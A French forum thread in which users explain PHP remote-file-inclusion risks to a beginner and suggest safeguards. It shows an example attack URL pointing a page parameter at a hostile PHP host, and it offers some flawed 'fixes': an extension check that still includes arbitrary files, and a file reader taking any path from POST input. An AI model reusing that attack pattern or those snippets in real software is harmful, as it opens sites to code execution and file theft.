les dangers de l'include PHP, pour un débutant

[Hyp]

Ce message a été modifié par Hyp - 12 May 2010, 11:51.

[No6]

Vieux probleme largement expliqué un peu partout :
http://www.frsirt.com/alertes/20041226.PhpIncludeWorm.php

Pour faire simple, ne pas faire des includes avec une variable dedans
genre: include($page);

mais mettre des valeurs fixes.

[Hyp]

Merci pour cette explication concise No6
J'irai lire en détail ton lien demain matin, il est l'heure d'aller dormir..
Bonne nuit.

[No6]

Je me sens tout guilleret, j'ai l'impression d'avoir repoussé un gros nuage noir du ciel de tes rêves

Ce message a été modifié par No6 - 24 Oct 2006, 23:00.

[Hyp]

Ce message a été modifié par Hyp - 12 May 2010, 11:52.

[No6]

Nous sommes tous obligés les uns envers les autres (formule boudhiste)

[hubeert]

coucou;
d'une maniere générale ( même si je suis loin , tres loin ;d'être un expert en sécurité web)
on protege ses pages avec un tableau associatif puis on vérifie que l'include correspond bien a ce que lon veut de ce genre la..

HTML

<html>
<head>
<title>Accueil</title>
<meta name="keywords" content="xxxxxx,xxxxx,ixxxxx,">
<meta name="description" content="xxxxxxxxxxxxxxxxxxxxx">

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>

SQL

<?php
$pageOK = array( 'objectifs' => 'objectifs.inc', 'info' => 'info_2.inc',
'adherent' => 'adherent.inc', 'tarifs' => 'tarifs.php',
'texteaccueil'=>'texteaccueil.php' );
?>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="720" border="0" cellpadding="0" class="arriereplan">
<tr height="80">
<td > </td>

</tr>
<tr>
<td valign="top" width="90"><?php include("menu.inc"); ?></td>
<td valign="top" align="center">

SQL

<?php if ( (isset($HTTP_GET_VARS['inc'])) && (isset($pageOK[$HTTP_GET_VARS['inc']])) ) {
include($pageOK[$HTTP_GET_VARS['inc']]);} else { include ("texteaccueil.php");}?>

</td>
</tr>
</table>
</body>
</html>

[schlum]

En général on active pas "register_globals"... Ca évite que des petits malins envoient n'importe quelle variable aux scripts.

[hubeert]

autre danger moins connu..

faire attention au extensions données
par defaut dans le dossier de configuration
Addtype application/x-httpd-php .phtml .php3 .php4 .php

si on fait par exemple
monfichierouilyamescodes.inc

puis qq de mal intentionné tape ce nom dans le navigateur.; il visualise directement le contenu parceque apache ne traite pas cela comme du php mais comme du texte.;

faire ceci..

Addtype application/x-httpd-php .phtml .php3 .php4 .php .inc .bak

bak est souvent une copie involontaire.;


php peut etre configuré en mode Safe
cacher sa signature php; ( plus dur pour connaitre la version)
et comme le dit schlum metre
register_global sur off

supprimer l'affichage des erreurs

display_errors=off

mais cest vrai que cest assez complexe..
le malintentioné ( que je differencie du hacker) connais aussi les habitudes des programmeurs et certains savent tres bien afficher les information que l'on a en debogant..

tire du livre "site marchand en PHP/MySQL" de jean marc herellier

le livre

Ce message a été modifié par hubeert - 25 Oct 2006, 10:39.

[canari]

pour monfichierouilyamescodes.inc, autant faire un fichier monfichierouilyamescodes.inc.php, comme ça tu vois que c'est un include, mais aussi que c'est du php

[No6]

pour monfichierouilyamescodes.inc, autant faire un fichier monfichierouilyamescodes.inc.php, comme ça tu vois que c'est un include, mais aussi que c'est du php

C'est une façon de voir, moi je fais un dossier "includes" ou j'y mets les includes en php...

[canari]

pour monfichierouilyamescodes.inc, autant faire un fichier monfichierouilyamescodes.inc.php, comme ça tu vois que c'est un include, mais aussi que c'est du php

C'est une façon de voir, moi je fais un dossier "includes" ou j'y mets les includes en php...

j'utilise aussi un répertoire "includes" mais les fichiers y sont de la forme *.inc.php
c'est juste avoir des fichiers *.inc et modifier le php.ini qui me surprend.
pour moi, il vaut mieux avoir l'extension .php (ou .inc.php) plutôt que .inc, mais chacun fait comme il veut

Ce message a été modifié par canari - 8 Nov 2006, 02:28.

[DUX]

le .inc pour les fichiers à inclure, c'est la vieille école. Celà n'a plus lieu d'être même pour les nostalgiques à cause de l'interprétation (ou plutot la non interprétation) par Apache / PHP.

[Hyp]

Ce message a été modifié par Hyp - 12 May 2010, 11:52.

[schlum]

Euh... "include" c'est pour inclure un fichier hein...
Si tu veux afficher juste une variable, fais "<?php echo $texte; ?>" ou plus simplement "<?=$texte?>"

[Hyp]

Euh... "include" c'est pour inclure un fichier hein...

(Vous aurez compris que le but de l'opération est de permettre à l'utilisateur d'inclure son texte dans l'interface que j'aurai mise en place )
-> (Vous aurez compris que le but de l'opération est de permettre à l'utilisateur d'inclure son fichier texte dans l'interface que j'aurai mise en place )

[schlum]

Ben justement, faut pas faire de "include($texte);"...
Surtout chez Free.

[No6]

Imaginons que je veuille faire la chose suivante:
h ttp://www.monsite.com/index.php?texte=vot...e.com/texte.txt

CODE

<html>
<head><title>Ma page index.php</title></head>
<body>
<h1>Voici votre texte:</h1>
<?php include $texte;?>
<!-- Pas sûr que la syntaxe soit correcte -->
</body>
</html>

Quelle méthode dois-je adopter ?

(Vous aurez compris que le but de l'opération est de permettre à l'utilisateur d'inclure son fichier texte dans l'interface que j'aurai mise en place )

Comme c'est expliqué plus haut, et répété par schlum : faut pas faire de "include($texte);"

Car un pirate va écrire comme URL :
h ttp://www.monsite.com/index.php?texte=http://page_pirate.php
avec dedans plein de code php pour te pourrir la vie, vider ton site, mettre ses stocks vidéo de cul piratés dessus pour les vendre

[Hyp]

Ce message a été modifié par Hyp - 12 May 2010, 11:52.

[Master Buck]

Oui ou plus simplement, il faut vérifier l'extension du fichier inclus avec :

CODE

$file = $_GET['file'];
$ext = strtolower(substr(strrchr($file, '.'), 1));
if ($ext == "txt" || file_exists($file))
include $file;
else
echo 'Oo, you wanna hack me, I'll eat potatoes.';

Ce message a été modifié par Master Buck - 16 Nov 2006, 20:12.

[Hyp]

Ce message a été modifié par Hyp - 12 May 2010, 11:52.

[schlum]

Oui ou plus simplement, il faut vérifier l'extension du fichier inclus avec :

CODE

$file = $_GET['file'];
$ext = strtolower(substr(strrchr($file, '.'), 1));
if ($ext == "txt" || file_exists($file))
include $file;
else
echo 'Oo, you wanna hack me, I'll eat potatoes.';

Et ? Ca permet quand même de mettre du PHP dans le .txt non ?

De toute façon, pour include, le fichier doit être sur le serveur... Et dans ce cas d'un fichier texte, la solution est la lecture de fichier :
http://www.commentcamarche.net/php/phpfich.php3

[Master Buck]

Euh, en toute logique, si le PHP est dans un fichier texte ou même HTML, il est pas executé, mais juste affiché, il faut faire htmlentity_decode() pour pouvoir l'executer (ou html_entity_decode(), je sais plus).

[schlum]

Euh, en toute logique, si le PHP est dans un fichier texte ou même HTML, il est pas executé, mais juste affiché, il faut faire htmlentity_decode() pour pouvoir l'executer (ou html_entity_decode(), je sais plus).

Test :

test1.php :

CODE

<?php
include "test2.txt";
?>

test2.txt :

CODE

<?php
phpinfo();
?>

-> Affiche bien les infos, donc ta théorie est fumeuse

[ghost-X]

Euh, en toute logique, si le PHP est dans un fichier texte ou même HTML, il est pas executé, mais juste affiché, il faut faire htmlentity_decode() pour pouvoir l'executer (ou html_entity_decode(), je sais plus).

A partir du moment que ton fichier est inclue dans une page qui seras interpreté par php, meme si celui-cui s'apelle text.toto, si il contient du php, il seras interpreté.

Par contre, avec ton htmlentities , tu est presque dans le vrai .
Il faudrais ouvrir le fichier, mettre son contenue dans une variable et faire <? echo htmlentities($ma_var_text); ?> et la plus de probleme .

[Master Buck]

Ha ouaip, ok, je vais faire gaffe maintenant, je savais pas...
Donc oui, ouvrir le fichier, faire un htmlentities, c'est comme j'ai fait pour mon éditeur de fichier, je cherche le code...

CODE

$link = $_POST['file'];

if (file_exists($link))
    $open = fopen($link,'r+');
echo htmlentities(file_get_contents($link));

Ce message a été modifié par Master Buck - 18 Nov 2006, 11:23.

[Grognon]

Pour faire simple, ne pas faire des includes avec une variable dedans
genre: include($page);

mais mettre des valeurs fixes.

Pour être sûr de bien comprendre
C'est bon un truc comme ça sachant que www.xxx.com n'est pas un serveur externe ?

CODE

include 'http://www.xxx.com/xxx/fichier.php';

[schlum]

Pour faire simple, ne pas faire des includes avec une variable dedans
genre: include($page);

mais mettre des valeurs fixes.

Pour être sûr de bien comprendre
C'est bon un truc comme ça sachant que www.xxx.com n'est pas un serveur externe ?

CODE

include 'http://www.xxx.com/xxx/fichier.php';

Oui... Si t'as confiance en le serveur externe
Enfin à priori, le serveur externe va déjà évaluer le php et sortir du HTML de toute façon...
Après, si quelqu'un pirate le serveur externe et met un script php avec 'echo("<?php")' ... 'echo("?>")', je ne sais pas ce que ça donne

[Grognon]

C'est bon un truc comme ça sachant que www.xxx.com n'est pas un serveur externe ?

Je sais, un chemin relatif c'est mieux mais j'ai pas encore tout compris le système du include_path donc, de guerre lasse…

[schlum]

C'est bon un truc comme ça sachant que www.xxx.com n'est pas un serveur externe ?

Je sais, un chemin relatif c'est mieux mais j'ai pas encore tout compris le système du include_path donc, de guerre lasse…

Ah d'accord, j'ai zappé la négation
Ben c'est comme ça qu'il faut faire, à part que c'est quand même mieux de mettre le chemin relatif
Dans un système UNIX, chaque répertoire contient deux répertoires "virtuels" (des liens en quelque sorte) :
. qui pointe vers lui même
.. qui pointe vers son répertoire père
Donc en utilisant .., tu peux remonter aussi loin que voulu !
Exemple : include("../../rep2/monFichier.php");